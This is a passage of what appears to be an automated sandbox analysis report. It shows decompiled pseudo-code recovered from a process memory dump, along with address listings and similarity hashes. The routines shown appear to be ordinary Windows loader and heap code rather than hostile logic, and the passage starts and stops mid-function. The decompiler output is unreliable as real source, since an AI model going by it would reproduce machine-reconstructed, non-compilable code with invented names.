                                                    																		_t307 = _t239;
                                                    																		_v60 = _t307;
                                                    																		_v48 = _t307;
                                                    																		__eflags = _t307;
                                                    																		if(_t307 != 0) {
                                                    																			L70:
                                                    																			_t216 = _v36;
                                                    																		} else {
                                                    																			_push(_t239);
                                                    																			_push(0x14);
                                                    																			_push( &_v144);
                                                    																			_push(3);
                                                    																			_push(_v44);
                                                    																			_push(0xffffffff);
                                                    																			_t319 = E04B89730();
                                                    																			_v36 = _t319;
                                                    																			__eflags = _t319;
                                                    																			if(_t319 < 0) {
                                                    																				_t216 = 0xc000001f;
                                                    																				_v36 = 0xc000001f;
                                                    																				_t307 = _v60;
                                                    																			} else {
                                                    																				_t307 = _v132;
                                                    																				L69:
                                                    																				_v48 = _t307;
                                                    																				goto L70;
                                                    																			}
                                                    																		}
                                                    																	}
                                                    																}
                                                    																L71:
                                                    																_v72 = _t307;
                                                    																_v84 = _t216;
                                                    																__eflags = _t216 - 0xc000007b;
                                                    																if(_t216 == 0xc000007b) {
                                                    																	L150:
                                                    																	_v8 = 0xfffffffe;
                                                    																	_t211 = 0xc000007b;
                                                    																} else {
                                                    																	_t344 = _t290 & 0xfffffffc;
                                                    																	_v76 = _t344;
                                                    																	__eflags = _v40 - _t344;
                                                    																	if(_v40 <= _t344) {
                                                    																		goto L150;
                                                    																	} else {
                                                    																		__eflags = _t307;
                                                    																		if(_t307 == 0) {
                                                    																			L75:
                                                    																			_t217 = 0;
                                                    																			_v104 = 0;
                                                    																			__eflags = _t366;
                                                    																			if(_t366 != 0) {
                                                    																				__eflags = _t290 & 0x00000001;
                                                    																				if((_t290 & 0x00000001) != 0) {
                                                    																					_t217 = 1;
                                                    																					_v104 = 1;
                                                    																				}
                                                    																				_t290 = _v44;
                                                    																				_v52 = _t290;
                                                    																			}
                                                    																			__eflags = _t217 - 1;
                                                    																			if(_t217 != 1) {
                                                    																				_t369 = 0;
                                                    																				_t218 = _v40;
                                                    																				goto L91;
                                                    																			} else {
                                                    																				_v64 = 0;
                                                    																				E04B5E9C0(1, _t290, 0, 0,  &_v64);
                                                    																				_t309 = _v64;
                                                    																				_v108 = _t309;
                                                    																				__eflags = _t309;
                                                    																				if(_t309 == 0) {
                                                    																					goto L143;
                                                    																				} else {
                                                    																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                    																					__eflags = _t226 - 0x10b;
                                                    																					if(_t226 != 0x10b) {
                                                    																						__eflags = _t226 - 0x20b;
                                                    																						if(_t226 != 0x20b) {
                                                    																							goto L143;
                                                    																						} else {
                                                    																							_t371 =  *(_t309 + 0x98);
                                                    																							goto L83;
                                                    																						}
                                                    																					} else {
                                                    																						_t371 =  *(_t309 + 0x88);
                                                    																						L83:
                                                    																						__eflags = _t371;
                                                    																						if(_t371 != 0) {
                                                    																							_v80 = _t371 - _t356 + _t290;
                                                    																							_t310 = _v64;
                                                    																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                    																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                    																							_t311 = 0;
                                                    																							__eflags = 0;
                                                    																							while(1) {
                                                    																								_v120 = _t311;
                                                    																								_v116 = _t348;
                                                    																								__eflags = _t311 - _t292;
                                                    																								if(_t311 >= _t292) {
                                                    																									goto L143;
                                                    																								}
                                                    																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                    																								__eflags = _t371 - _t359;
                                                    																								if(_t371 < _t359) {
                                                    																									L98:
                                                    																									_t348 = _t348 + 0x28;
                                                    																									_t311 = _t311 + 1;
                                                    																									continue;
                                                    																								} else {
                                                    																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                    																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                    																										goto L98;
                                                    																									} else {
                                                    																										__eflags = _t348;
                                                    																										if(_t348 == 0) {
                                                    																											goto L143;
                                                    																										} else {
                                                    																											_t218 = _v40;
                                                    																											_t312 =  *_t218;
                                                    																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                    																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                    																												_v100 = _t359;
                                                    																												_t360 = _v108;
                                                    																												_t372 = L04B58F44(_v108, _t312);
                                                    																												__eflags = _t372;
                                                    																												if(_t372 == 0) {
                                                    																													goto L143;
                                                    																												} else {
                                                    																													_t290 = _v52;
                                                    																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04B83C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                    																													_t307 = _v72;
                                                    																													_t344 = _v76;
                                                    																													_t218 = _v40;
                                                    																													goto L91;
                                                    																												}
                                                    																											} else {
                                                    																												_t290 = _v52;
                                                    																												_t307 = _v72;
                                                    																												_t344 = _v76;
                                                    																												_t369 = _v80;
                                                    																												L91:
                                                    																												_t358 = _a4;
                                                    																												__eflags = _t358;
                                                    																												if(_t358 == 0) {
                                                    																													L95:
                                                    																													_t308 = _a8;
                                                    																													__eflags = _t308;
                                                    																													if(_t308 != 0) {
                                                    																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                    																													}
                                                    																													_v8 = 0xfffffffe;
                                                    																													_t211 = _v84;
                                                    																												} else {
                                                    																													_t370 =  *_t218 - _t369 + _t290;
                                                    																													 *_t358 = _t370;
                                                    																													__eflags = _t370 - _t344;
                                                    																													if(_t370 <= _t344) {
                                                    																														L149:
                                                    																														 *_t358 = 0;
                                                    																														goto L150;
                                                    																													} else {
                                                    																														__eflags = _t307;
                                                    																														if(_t307 == 0) {
                                                    																															goto L95;
                                                    																														} else {
                                                    																															__eflags = _t370 - _t344 + _t307;
                                                    																															if(_t370 >= _t344 + _t307) {
                                                    																																goto L149;
                                                    																															} else {
                                                    																																goto L95;
                                                    																															}
                                                    																														}
                                                    																													}
                                                    																												}
                                                    																											}
                                                    																										}
                                                    																									}
                                                    																								}
                                                    																								goto L97;
                                                    																							}
                                                    																						}
                                                    																						goto L143;
                                                    																					}
                                                    																				}
                                                    																			}
                                                    																		} else {
                                                    																			__eflags = _v40 - _t307 + _t344;
                                                    																			if(_v40 >= _t307 + _t344) {
                                                    																				goto L150;
                                                    																			} else {
                                                    																				goto L75;
                                                    																			}
                                                    																		}
                                                    																	}
                                                    																}
                                                    															}
                                                    															L97:
                                                    															 *[fs:0x0] = _v20;
                                                    															return _t211;
                                                    														}
                                                    													}
                                                    												}
                                                    											}
                                                    										} else {
                                                    											goto L46;
                                                    										}
                                                    									}
                                                    								}
                                                    								goto L151;
                                                    							}
                                                    							_t288 = _v164;
                                                    							_t366 = 0xc0000135;
                                                    							goto L41;
                                                    						}
                                                    					}
                                                    				}
                                                    				L151:
                                                    			}








































































































                                                    0x04b5dc43
                                                    0x00000000
                                                    0x04b5dc45
                                                    0x04b5dc45
                                                    0x04b5dc47
                                                    0x00000000
                                                    0x04b5dc4d
                                                    0x04b5dc4d
                                                    0x04b5dc50
                                                    0x04b5dc52
                                                    0x04b5dc55
                                                    0x04b5dcfa
                                                    0x04b5dcfe
                                                    0x04b5dd08
                                                    0x04b5dd0a
                                                    0x04b5dd0c
                                                    0x00000000
                                                    0x04b5dd12
                                                    0x04b5dd15
                                                    0x04b5dd2d
                                                    0x04b5dd2f
                                                    0x04b5dd32
                                                    0x04b5dd35
                                                    0x00000000
                                                    0x04b5dd35
                                                    0x04b5dc5b
                                                    0x04b5dc5b
                                                    0x04b5dc5e
                                                    0x04b5dc61
                                                    0x04b5dc64
                                                    0x04b5dc67
                                                    0x04b5dc67
                                                    0x04b5dc6a
                                                    0x04b5dc6c
                                                    0x04b5dc8e
                                                    0x04b5dc8e
                                                    0x04b5dc91
                                                    0x04b5dc93
                                                    0x04b5dcce
                                                    0x04b5dcce
                                                    0x04b5dc95
                                                    0x04b5dc9c
                                                    0x04b5dc6e
                                                    0x04b5dc72
                                                    0x04b5dc75
                                                    0x04b5dc77
                                                    0x04b5dc79
                                                    0x04bab551
                                                    0x04bab551
                                                    0x00000000
                                                    0x04b5dc7f
                                                    0x04b5dc7f
                                                    0x04b5dc81
                                                    0x00000000
                                                    0x04b5dc83
                                                    0x04b5dc86
                                                    0x04b5dc88
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5dc88
                                                    0x04b5dc81
                                                    0x04b5dc79
                                                    0x04b5dc6c
                                                    0x04b5dc55
                                                    0x04b5dc47
                                                    0x04b5dc43
                                                    0x00000000
                                                    0x04b5dc36
                                                    0x04b5dc23
                                                    0x00000000
                                                    0x04b5dbff
                                                    0x04b5dbf1
                                                    0x04b5dbdf
                                                    0x04b5db8f
                                                    0x04b5db92
                                                    0x04b5db95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5db95
                                                    0x04b5db8d
                                                    0x04b5db85
                                                    0x04b5db74
                                                    0x04b5dc9f
                                                    0x04b5dca2
                                                    0x04b5dcb0
                                                    0x04b5dcb0
                                                    0x04b5dad1
                                                    0x04bab4e5
                                                    0x04bab4c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5d831
                                                    0x04b5d80d
                                                    0x00000000
                                                    0x04b5d800
                                                    0x04bab47f
                                                    0x04bab485
                                                    0x00000000
                                                    0x04bab485
                                                    0x04b5d665
                                                    0x04b5d652
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d4fe7748c619cffb14749792595e8e271d6cbd7230525e865a9abff2b7cdaf65
                                                    • Instruction ID: f5da8ea34d898eab3348e2cb9d7be93d12aa8cac16ebface5c269d95652186c7
                                                    • Opcode Fuzzy Hash: d4fe7748c619cffb14749792595e8e271d6cbd7230525e865a9abff2b7cdaf65
                                                    • Instruction Fuzzy Hash: 95E1BE34A052598FEB24DF28C890B69F7B6FF45308F0482E9DA19972A0DB34BD95CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 92%
                                                    			E04B5849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                                    				void* _t136;
                                                    				signed int _t139;
                                                    				signed int _t141;
                                                    				signed int _t145;
                                                    				intOrPtr _t146;
                                                    				signed int _t149;
                                                    				signed int _t150;
                                                    				signed int _t161;
                                                    				signed int _t163;
                                                    				signed int _t165;
                                                    				signed int _t169;
                                                    				signed int _t171;
                                                    				signed int _t194;
                                                    				signed int _t200;
                                                    				void* _t201;
                                                    				signed int _t204;
                                                    				signed int _t206;
                                                    				signed int _t210;
                                                    				signed int _t214;
                                                    				signed int _t215;
                                                    				signed int _t218;
                                                    				void* _t221;
                                                    				signed int _t224;
                                                    				signed int _t226;
                                                    				intOrPtr _t228;
                                                    				signed int _t232;
                                                    				signed int _t233;
                                                    				signed int _t234;
                                                    				void* _t237;
                                                    				void* _t238;
                                                    
                                                    				_t236 = __esi;
                                                    				_t235 = __edi;
                                                    				_t193 = __ebx;
                                                    				_push(0x70);
                                                    				_push(0x4c1f9c0);
                                                    				E04B9D0E8(__ebx, __edi, __esi);
                                                    				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                                    				if( *0x4c37b04 == 0) {
                                                    					L4:
                                                    					goto L5;
                                                    				} else {
                                                    					_t136 = E04B5CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                                    					_t236 = 0;
                                                    					if(_t136 < 0) {
                                                    						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                                    					}
                                                    					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                                    						_t193 =  *( *[fs:0x30] + 0x18);
                                                    						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                                    						 *(_t237 - 0x68) = _t236;
                                                    						 *(_t237 - 0x6c) = _t236;
                                                    						_t235 = _t236;
                                                    						 *(_t237 - 0x60) = _t236;
                                                    						E04B62280( *[fs:0x30], 0x4c38550);
                                                    						_t139 =  *0x4c37b04; // 0x1
                                                    						__eflags = _t139 - 1;
                                                    						if(__eflags != 0) {
                                                    							_t200 = 0xc;
                                                    							_t201 = _t237 - 0x40;
                                                    							_t141 = E04B7F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                                    							 *(_t237 - 0x44) = _t141;
                                                    							__eflags = _t141;
                                                    							if(_t141 < 0) {
                                                    								L50:
                                                    								E04B5FFB0(_t193, _t235, 0x4c38550);
                                                    								L5:
                                                    								return E04B9D130(_t193, _t235, _t236);
                                                    							}
                                                    							_push(_t201);
                                                    							_t221 = 0x10;
                                                    							_t202 =  *(_t237 - 0x40);
                                                    							_t145 = E04B41C45( *(_t237 - 0x40), _t221);
                                                    							 *(_t237 - 0x44) = _t145;
                                                    							__eflags = _t145;
                                                    							if(_t145 < 0) {
                                                    								goto L50;
                                                    							}
                                                    							_t146 =  *0x4c37b9c; // 0x0
                                                    							_t235 = L04B64620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                                    							 *(_t237 - 0x60) = _t235;
                                                    							__eflags = _t235;
                                                    							if(_t235 == 0) {
                                                    								_t149 = 0xc0000017;
                                                    								 *(_t237 - 0x44) = 0xc0000017;
                                                    							} else {
                                                    								_t149 =  *(_t237 - 0x44);
                                                    							}
                                                    							__eflags = _t149;
                                                    							if(__eflags >= 0) {
                                                    								L8:
                                                    								 *(_t237 - 0x64) = _t235;
                                                    								_t150 =  *0x4c37b10; // 0x10
                                                    								 *(_t237 - 0x4c) = _t150;
                                                    								_push(_t237 - 0x74);
                                                    								_push(_t237 - 0x39);
                                                    								_push(_t237 - 0x58);
                                                    								_t193 = E04B7A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                                    								 *(_t237 - 0x44) = _t193;
                                                    								__eflags = _t193;
                                                    								if(_t193 < 0) {
                                                    									L30:
                                                    									E04B5FFB0(_t193, _t235, 0x4c38550);
                                                    									__eflags = _t235 - _t237 - 0x38;
                                                    									if(_t235 != _t237 - 0x38) {
                                                    										_t235 =  *(_t237 - 0x48);
                                                    										L04B677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                                    									} else {
                                                    										_t235 =  *(_t237 - 0x48);
                                                    									}
                                                    									__eflags =  *(_t237 - 0x6c);
                                                    									if( *(_t237 - 0x6c) != 0) {
                                                    										L04B677F0(_t235, _t236,  *(_t237 - 0x6c));
                                                    									}
                                                    									__eflags = _t193;
                                                    									if(_t193 >= 0) {
                                                    										goto L4;
                                                    									} else {
                                                    										goto L5;
                                                    									}
                                                    								}
                                                    								_t204 =  *0x4c37b04; // 0x1
                                                    								 *(_t235 + 8) = _t204;
                                                    								__eflags =  *((char*)(_t237 - 0x39));
                                                    								if( *((char*)(_t237 - 0x39)) != 0) {
                                                    									 *(_t235 + 4) = 1;
                                                    									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                                    									_t161 =  *0x4c37b10; // 0x10
                                                    									 *(_t237 - 0x4c) = _t161;
                                                    								} else {
                                                    									 *(_t235 + 4) = _t236;
                                                    									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                                    								}
                                                    								 *((intOrPtr*)(_t237 - 0x54)) = E04B837C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                                    								_t224 = _t236;
                                                    								 *(_t237 - 0x40) = _t236;
                                                    								 *(_t237 - 0x50) = _t236;
                                                    								while(1) {
                                                    									_t163 =  *(_t235 + 8);
                                                    									__eflags = _t224 - _t163;
                                                    									if(_t224 >= _t163) {
                                                    										break;
                                                    									}
                                                    									_t228 =  *0x4c37b9c; // 0x0
                                                    									_t214 = L04B64620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                                    									 *(_t237 - 0x78) = _t214;
                                                    									__eflags = _t214;
                                                    									if(_t214 == 0) {
                                                    										L52:
                                                    										_t193 = 0xc0000017;
                                                    										L19:
                                                    										 *(_t237 - 0x44) = _t193;
                                                    										L20:
                                                    										_t206 =  *(_t237 - 0x40);
                                                    										__eflags = _t206;
                                                    										if(_t206 == 0) {
                                                    											L26:
                                                    											__eflags = _t193;
                                                    											if(_t193 < 0) {
                                                    												E04B837F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                                    												__eflags =  *((char*)(_t237 - 0x39));
                                                    												if( *((char*)(_t237 - 0x39)) != 0) {
                                                    													 *0x4c37b10 =  *0x4c37b10 - 8;
                                                    												}
                                                    											} else {
                                                    												_t169 =  *(_t237 - 0x68);
                                                    												__eflags = _t169;
                                                    												if(_t169 != 0) {
                                                    													 *0x4c37b04 =  *0x4c37b04 - _t169;
                                                    												}
                                                    											}
                                                    											__eflags = _t193;
                                                    											if(_t193 >= 0) {
                                                    												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                                    											}
                                                    											goto L30;
                                                    										}
                                                    										_t226 = _t206 * 0xc;
                                                    										__eflags = _t226;
                                                    										_t194 =  *(_t237 - 0x48);
                                                    										do {
                                                    											 *(_t237 - 0x40) = _t206 - 1;
                                                    											_t226 = _t226 - 0xc;
                                                    											 *(_t237 - 0x4c) = _t226;
                                                    											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                                    											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                                    												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                                    												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                                    													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                                    													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                    													__eflags =  *((char*)(_t237 - 0x39));
                                                    													if( *((char*)(_t237 - 0x39)) == 0) {
                                                    														_t171 = _t210;
                                                    													} else {
                                                    														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                                    														L04B677F0(_t194, _t236, _t210 - 8);
                                                    														_t171 =  *(_t237 - 0x50);
                                                    													}
                                                    													L48:
                                                    													L04B677F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                                    													L46:
                                                    													_t206 =  *(_t237 - 0x40);
                                                    													_t226 =  *(_t237 - 0x4c);
                                                    													goto L24;
                                                    												}
                                                    												 *0x4c37b08 =  *0x4c37b08 + 1;
                                                    												goto L24;
                                                    											}
                                                    											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                    											__eflags = _t171;
                                                    											if(_t171 != 0) {
                                                    												__eflags =  *((char*)(_t237 - 0x39));
                                                    												if( *((char*)(_t237 - 0x39)) == 0) {
                                                    													goto L48;
                                                    												}
                                                    												E04B857C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                                    												goto L46;
                                                    											}
                                                    											L24:
                                                    											__eflags = _t206;
                                                    										} while (_t206 != 0);
                                                    										_t193 =  *(_t237 - 0x44);
                                                    										goto L26;
                                                    									}
                                                    									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                                    									 *(_t237 - 0x7c) = _t232;
                                                    									 *(_t232 - 4) = _t214;
                                                    									 *(_t237 - 4) = _t236;
                                                    									E04B8F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                                    									_t238 = _t238 + 0xc;
                                                    									 *(_t237 - 4) = 0xfffffffe;
                                                    									_t215 =  *(_t237 - 0x48);
                                                    									__eflags = _t193;
                                                    									if(_t193 < 0) {
                                                    										L04B677F0(_t215, _t236,  *(_t237 - 0x78));
                                                    										goto L20;
                                                    									}
                                                    									__eflags =  *((char*)(_t237 - 0x39));
                                                    									if( *((char*)(_t237 - 0x39)) != 0) {
                                                    										_t233 = E04B7A44B( *(_t237 - 0x4c));
                                                    										 *(_t237 - 0x50) = _t233;
                                                    										__eflags = _t233;
                                                    										if(_t233 == 0) {
                                                    											L04B677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                                    											goto L52;
                                                    										}
                                                    										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                                    										L17:
                                                    										_t234 =  *(_t237 - 0x40);
                                                    										_t218 = _t234 * 0xc;
                                                    										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                                    										 *(_t218 + _t235 + 0x10) = _t236;
                                                    										_t224 = _t234 + 1;
                                                    										 *(_t237 - 0x40) = _t224;
                                                    										 *(_t237 - 0x50) = _t224;
                                                    										_t193 =  *(_t237 - 0x44);
                                                    										continue;
                                                    									}
                                                    									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                                    									goto L17;
                                                    								}
                                                    								 *_t235 = _t236;
                                                    								_t165 = 0x10 + _t163 * 0xc;
                                                    								__eflags = _t165;
                                                    								_push(_t165);
                                                    								_push(_t235);
                                                    								_push(0x23);
                                                    								_push(0xffffffff);
                                                    								_t193 = E04B896C0();
                                                    								goto L19;
                                                    							} else {
                                                    								goto L50;
                                                    							}
                                                    						}
                                                    						_t235 = _t237 - 0x38;
                                                    						 *(_t237 - 0x60) = _t235;
                                                    						goto L8;
                                                    					}
                                                    					goto L4;
                                                    				}
                                                    			}


































                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 35f8a0ad1cd6f23789293969a5d6b0c1c25a60ace321c6baffec2f9698fe4cf6
                                                    • Instruction ID: e6b8f03051e1359ce4f192d9223fce7b71e3e6419890eed5659ca4c4b00963c9
                                                    • Opcode Fuzzy Hash: 35f8a0ad1cd6f23789293969a5d6b0c1c25a60ace321c6baffec2f9698fe4cf6
                                                    • Instruction Fuzzy Hash: F4B15AB4E00209DFDB14EF99C984BADFBB5FF48308F1045AAE815AB251E774B855CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E04B7513A(intOrPtr __ecx, void* __edx) {
                                                    				signed int _v8;
                                                    				signed char _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				char _v28;
                                                    				signed int _v32;
                                                    				signed int _v36;
                                                    				signed int _v40;
                                                    				intOrPtr _v44;
                                                    				intOrPtr _v48;
                                                    				char _v63;
                                                    				char _v64;
                                                    				signed int _v72;
                                                    				signed int _v76;
                                                    				signed int _v80;
                                                    				signed int _v84;
                                                    				signed int _v88;
                                                    				signed char* _v92;
                                                    				signed int _v100;
                                                    				signed int _v104;
                                                    				char _v105;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* _t157;
                                                    				signed int _t159;
                                                    				signed int _t160;
                                                    				unsigned int* _t161;
                                                    				intOrPtr _t165;
                                                    				signed int _t172;
                                                    				signed char* _t181;
                                                    				intOrPtr _t189;
                                                    				intOrPtr* _t200;
                                                    				signed int _t202;
                                                    				signed int _t203;
                                                    				char _t204;
                                                    				signed int _t207;
                                                    				signed int _t208;
                                                    				void* _t209;
                                                    				intOrPtr _t210;
                                                    				signed int _t212;
                                                    				signed int _t214;
                                                    				signed int _t221;
                                                    				signed int _t222;
                                                    				signed int _t226;
                                                    				intOrPtr* _t232;
                                                    				signed int _t233;
                                                    				signed int _t234;
                                                    				intOrPtr _t237;
                                                    				intOrPtr _t238;
                                                    				intOrPtr _t240;
                                                    				void* _t245;
                                                    				signed int _t246;
                                                    				signed int _t247;
                                                    				void* _t248;
                                                    				void* _t251;
                                                    				void* _t252;
                                                    				signed int _t253;
                                                    				signed int _t255;
                                                    				signed int _t256;
                                                    
                                                    				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                    				_v8 =  *0x4c3d360 ^ _t255;
                                                    				_v32 = _v32 & 0x00000000;
                                                    				_t251 = __edx;
                                                    				_t237 = __ecx;
                                                    				_t212 = 6;
                                                    				_t245 =  &_v84;
                                                    				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                    				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                    				_v48 = __ecx;
                                                    				_v36 = _t207;
                                                    				_t157 = memset(_t245, 0, _t212 << 2);
                                                    				_t256 = _t255 + 0xc;
                                                    				_t246 = _t245 + _t212;
                                                    				if(_t207 == 2) {
                                                    					_t247 =  *(_t237 + 0x60);
                                                    					_t208 =  *(_t237 + 0x64);
                                                    					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                    					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                    					_v104 = _t159;
                                                    					_v76 = _t159;
                                                    					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                    					_v100 = _t160;
                                                    					_v72 = _t160;
                                                    					L19:
                                                    					_v80 = _t208;
                                                    					_v84 = _t247;
                                                    					L8:
                                                    					_t214 = 0;
                                                    					if( *(_t237 + 0x74) > 0) {
                                                    						_t82 = _t237 + 0x84; // 0x124
                                                    						_t161 = _t82;
                                                    						_v92 = _t161;
                                                    						while( *_t161 >> 0x1f != 0) {
                                                    							_t200 = _v92;
                                                    							if( *_t200 == 0x80000000) {
                                                    								break;
                                                    							}
                                                    							_t214 = _t214 + 1;
                                                    							_t161 = _t200 + 0x10;
                                                    							_v92 = _t161;
                                                    							if(_t214 <  *(_t237 + 0x74)) {
                                                    								continue;
                                                    							}
                                                    							goto L9;
                                                    						}
                                                    						_v88 = _t214 << 4;
                                                    						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                    						_t165 = 0;
                                                    						asm("adc eax, [ecx+edx+0x7c]");
                                                    						_v24 = _t165;
                                                    						_v28 = _v40;
                                                    						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                    						_t221 = _v40;
                                                    						_v16 =  *_v92;
                                                    						_v32 =  &_v28;
                                                    						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                    							goto L9;
                                                    						}
                                                    						_t240 = _v48;
                                                    						if( *_v92 != 0x80000000) {
                                                    							goto L9;
                                                    						}
                                                    						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                    						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                    						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                    						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                    						_t226 = 0;
                                                    						_t181 = _t251 + 0x66;
                                                    						_v88 = 0;
                                                    						_v92 = _t181;
                                                    						do {
                                                    							if( *((char*)(_t181 - 2)) == 0) {
                                                    								goto L31;
                                                    							}
                                                    							_t226 = _v88;
                                                    							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                    								_t181 = E04B8D0F0(1, _t226 + 0x20, 0);
                                                    								_t226 = _v40;
                                                    								 *(_t226 + 8) = _t181;
                                                    								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                    								L34:
                                                    								if(_v44 == 0) {
                                                    									goto L9;
                                                    								}
                                                    								_t210 = _v44;
                                                    								_t127 = _t210 + 0x1c; // 0x1c
                                                    								_t249 = _t127;
                                                    								E04B62280(_t181, _t127);
                                                    								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                    								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                    								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                    									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                    								}
                                                    								_t189 = L04B64620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                    								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                    								if(_t189 != 0) {
                                                    									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                    									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                    									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                    									 *_t232 = _t232 + 0x10;
                                                    									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                    									E04B8F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                    									_t256 = _t256 + 0xc;
                                                    								}
                                                    								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                    								E04B5FFB0(_t210, _t249, _t249);
                                                    								_t222 = _v76;
                                                    								_t172 = _v80;
                                                    								_t208 = _v84;
                                                    								_t247 = _v88;
                                                    								L10:
                                                    								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                    								_v44 = _t238;
                                                    								if(_t238 != 0) {
                                                    									 *0x4c3b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                    									_v44();
                                                    								}
                                                    								_pop(_t248);
                                                    								_pop(_t252);
                                                    								_pop(_t209);
                                                    								return E04B8B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                    							}
